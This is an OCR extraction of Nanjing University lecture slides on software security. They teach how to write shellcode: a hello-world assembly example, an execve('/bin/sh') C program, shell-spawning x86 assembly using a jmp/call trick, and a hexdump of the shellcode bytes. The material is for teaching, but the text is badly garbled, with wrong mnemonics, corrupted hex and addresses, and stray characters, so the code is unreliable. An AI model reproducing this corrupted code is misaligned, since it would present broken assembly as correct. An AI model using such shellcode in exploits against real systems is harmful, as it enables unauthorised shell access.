Shellcode Basic Example Soltware Security How to write shellcode? Bufler Overflow;The hello.asm(stdout:hello world) Essentials section .data ;section declaretion Banc Eluntha nsg db "Hello,world!" :the string Shellcode section .text :section declaration Daficen global start :Default entry point for ELF Linking Basie Erample Shali-Spanrng start: A Real Word Butter Overflow Attac比 :wr1te》cal nov eax,4;put 4 into eax,since write is syscall 4 nov ebx,1;put stdout int ebx.since the proper fd is 1 og每n nhatb 留ae9tw 学■n Inleger Overfiow Int 0x8e;Call the kernel to nake the systen call happen Overvie Aah出E :exitllcall mov eax,1;put 1 into eax,since exit is syscall #1 nov ebx.9:put 8 into ebx Hesp Overflow int 8x80;Call the kermet to moke the system catl happen m过士aM年 Angad Ex-年 Nanjng Uivarsiy
83 Software Security Buffer Overflow:The Essentials Vulnerability Metrics What are Buffer Overflow? Basic Example Shellcode Definition 20 Basic Example Shell-Spawning Shellcode A Real World Buffer Overflow Attack Key Point A vulnerability in Easy RM to MP3 Conversion How to hack the vulnerable program Integer Overflow Overview A Real World Example Common Patterns in Integer Overflow Heap Overflow What is the Heap? An Abstract Example Dept. of Computer Science, Nanjing University Shellcode Basic Example How to write shellcode? hello.asm(stdout: hello world)
Shellcode Basic Example Soltware Security How to write shellcode? objdump-d a.out Essentials zhujun3zhujun-desktop:-/Desktop/BufrerOverflow s objdump -d a.out Banc Eluntha Shellcode a.out: file format elf32-1386 Daficen Basie Erample Shali-Spnring tc Disassenbly of section .text: A Real Warid Butfer Overflow Attac比 98948089<start>: 8348880: b849e889 MOv 50x4,2aX 8948885: bb019e889 MOv 50x1,%ebx 字■n 894808a: b9a499488 MOV 50x8849084,2cx Inleger Overfiow 894888f日 ba 0d 00 08 00 MOV S0xd,%edx Owerve AdM出E 8848094: cd 88 int 50x88 8848996: b80189e90 ttagar Oiaife ROV S0x1,%eax 894809L: bb 68 00 08 00 Hesp Overflow ROY s0x0,%ebx mt士sM年到 89480e8: cd 80 int 50x89 Ahead Ex年 Naning Ueivarsiy
83 Software Security Buffer Overflow:The Essentials Vulnerability Metrics What are Buffer Overflow? Basic Example Shellcode Definition 21 Basic Example Shell-Spawning Shellcode A Real World Buffer Overflow Attack Key Point A vulnerability in Easy RM to MP3 Conversion How to hack the vulnerable program Integer Overflow Overview A Real World Example Common Patterns in Integer Overflow Heap Overflow What is the Heap? An Abstract Example Dept. of Computer Science, Nanjing University Shellcode Basic Example How to write shellcode? objdump -d a.out
Shellcode Shell-Spawning Shellcode Soltware Security Shell-Spawning Shellcode 1 finclude cunistd.h> 2 Banc Eluntha 3 int main() Shellcode 4 char filename ["/bin/sh\x00; Dufincien 5 char .argv,.envp;/arrays that contain char pointers 6 Sh-Spuwning Shelico山 1 argv[0]filename;/only argunent is filename A Real Waric时Buie argv[1]-0;/null terminate the argunent array Overflow Attac比 10 envp[0]=0;/null terminate the envirorment array 1 12 execve(filename,argv,envpl; 学■n 131 Inleger Overfiow Owerve zlinghacking-tao:~/booksre gcc exec_shell.c AdM出E zlinghacking-tao:~/booksre we -c ./a.out 6662./a.0ut zlinghacking-tao:-/booksre ./a.out Hesp Overflow sh-3.29 exit m过士aM年 MAEE=年电 Naning Ueivarsiy
83 Software Security Buffer Overflow:The Essentials Vulnerability Metrics What are Buffer Overflow? Basic Example Shellcode Definition Basic Example 22 Shell-Spawning Shellcode A Real World Buffer Overflow Attack Key Point A vulnerability in Easy RM to MP3 Conversion How to hack the vulnerable program Integer Overflow Overview A Real World Example Common Patterns in Integer Overflow Heap Overflow What is the Heap? An Abstract Example Dept. of Computer Science, Nanjing University Shellcode Shell-Spawning Shellcode Shell-Spawning Shellcode
Shellcode Shell-Spawning Shellcode Soltware Security Shell-Spawning Shellcode Bufler Overflow;The Essentials 1IT82 Banc Eluntha 2 Shellcode 3 jnp short two Jurp dovn to the botton for the call trick Dufincien 4ane: 5:int execve (const char +filenane,char sconst argy []char const envp] Shl-Spawning Shelicod山 6 pop ebx ebx has the addr of the atring A Real Waric时Buie 7cr4,电a%:pt01hto0ax Overflow Attack 日ow【ex+],al;null terinate tbe1nf9 h atring 9 nov [ebx+81,ebx put addr fron ebx where the AAAA is 10. nov [ehx+121.wax put 32-bit null terminator wbere the BB33 is a位匀snm lea ecx,[ebx+8!load the addreas of [ebx+81 into eex for argv ptr og每n nhatib 11 学■n 121eaet,【atx+12】7=ea+12,ich is the emvp pt工 13 Inleger Overfiow tow al,11 75y5ca1t11 Owerve 14 int 0xB0 do it Ad出E 15 16 txo: ttagar Oiaife 17 call one Use a call to get string address Hesp Overflow 18 db '/bin/sh' the XAAAABBBB bytes aren't needed mt士sM年到 Ahgad Ex-年 Naning Ueivarsiy
83 Software Security Buffer Overflow:The Essentials Vulnerability Metrics What are Buffer Overflow? Basic Example Shellcode Definition Basic Example 23 Shell-Spawning Shellcode A Real World Buffer Overflow Attack Key Point A vulnerability in Easy RM to MP3 Conversion How to hack the vulnerable program Integer Overflow Overview A Real World Example Common Patterns in Integer Overflow Heap Overflow What is the Heap? An Abstract Example Dept. of Computer Science, Nanjing University Shellcode Shell-Spawning Shellcode Shell-Spawning Shellcode
Shellcode Shell-Spawning Shellcode Soltware Security Bufler Overflow;The Shell-Spawning Shellcode Essentials B4eEi山 Shellcode zlin@hacking-tao:/booksrc nasm exec shell.s zlin@hacking-tao:/booksre hexdump -C exec_shell 6hl-Spawning8 hificed山 A Real Warid Butter 0000000eb165h31c0884307895h0989430c8d4b1.[1.C..C.K Overflow Attac比 00000010088d530cb00hcd80e8e5 ffff ff2f62691.8../bi 000000206e2F7368 In/shl 学■n 00000024 Inleger Overfiow Owerviea zlin@hacking-tao:/booksrc wc -c exec shell AFa Wo出E 36 exec_shell Hesp Overflaw mt士sM年到 M Ahead E=年 Nanjng Uiversiy
83 Software Security Buffer Overflow:The Essentials Vulnerability Metrics What are Buffer Overflow? Basic Example Shellcode Definition Basic Example 24 Shell-Spawning Shellcode A Real World Buffer Overflow Attack Key Point A vulnerability in Easy RM to MP3 Conversion How to hack the vulnerable program Integer Overflow Overview A Real World Example Common Patterns in Integer Overflow Heap Overflow What is the Heap? An Abstract Example Dept. of Computer Science, Nanjing University Shellcode Shell-Spawning Shellcode Shell-Spawning Shellcode